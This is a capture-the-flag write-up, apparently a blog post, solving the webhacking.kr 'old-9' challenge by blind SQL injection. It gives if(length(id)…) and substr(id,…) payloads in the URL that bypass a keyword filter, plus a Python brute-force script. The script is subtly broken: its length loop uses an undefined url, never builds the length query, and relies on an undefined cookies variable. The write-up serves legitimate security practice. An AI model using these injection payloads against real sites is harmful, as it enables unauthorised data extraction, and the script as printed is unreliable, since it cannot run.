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Web Security/webhacking.kr

[Webhacking.kr] old-9


This problem is in webhacking.kr.
URL: https://webhacking.kr/challenge/web-09/

If you enter the URL, you can see a page like the below photo.


First, Click 1

If you click one, you can see a page like this.
Then, the URL of the page is https://webhacking.kr/challenge/web-09/?no=1.

Second, Click 2

If you click two, you can see a page like this.
Then, the URL of the page is https://webhacking.kr/challenge/web-09/?no=2.

Third, Click 3

Likewise, only the 'no' value of URL changes to 3.

Based on that, if you change the value of 'no' to 4, you can see a page like the below photo.


Thus, the specific text is disappeared.

But, we can know "column: id, no" and "no 3's id is password" through this.

In conclusion, if you enter 3's ID in the password, the problem is solved.

Besides, the column has two elements that are 'id' and 'no'.

Through this, we can think about SQL Injection or Blind SQL Injection.
So, I tried to enter union, select, ' or 1=1#, etc...
But, the page showed Access Denied and could not be solved in this way.


Thus, I tried to use IF STATEMENT supporting by SQL.
We can compose IF STATEMENT in the SQL where condition query.

if ( Condition, [Return when true], [Return when false] ) 

Based on that, let's test.

First, URL: https://webhacking.kr/challenge/web-09/?no=if(length(id)like(5),1,404)


The page correctly prints "Apple". Then, if you change the if(length(id)like(5),1,404) to if(length(id)like(5),2,404),
it will not print the word "Apple".


Second, let's test the second id.

URL: https://webhacking.kr/challenge/web-09/?no=if(length(id)like(6),2,404)

The page correctly prints "Banana".


Thus, we could find out the string length of the third ID in this way.
In addition, we could find out the third ID by using substr function.

It's not easy to get to know each one by one, so I wrote the code.

Python Code

import requests 

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117'}
keywords = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'

def HttpRequest(num, text): 
    id_length = 0 
    result = ''
    for i in range(1, 20):
        res = requests.get(url, headers=headers, cookies=cookies)
        if text in res.text: 
            id_length = i
            print('no {}\'s id length: {}'.format(num, i))

    for i in range(1, id_length + 1):
        for key in keywords: 
            url = 'https://webhacking.kr/challenge/web-09/index.php?no=if(substr(id,{},1)like({}),{},404)'.format(i, hex(ord(key)), num)
            res = requests.get(url, headers=headers, cookies=cookies)
            if text in res.text: 
                result += key

    print("no {}\' id: {}".format(num, result))

if __name__== '__main__':
    HttpRequest(3, "Secret")

In priority, After obtaining the length of the ID, find out the ID through keywords.
As a result, we can obtain a third ID like this.

If you find it difficult to understand the code, refer to the below URL.

Python Request Module: https://hongku.tistory.com/292


Thus, if you enter it into a password, it will be solved like this.


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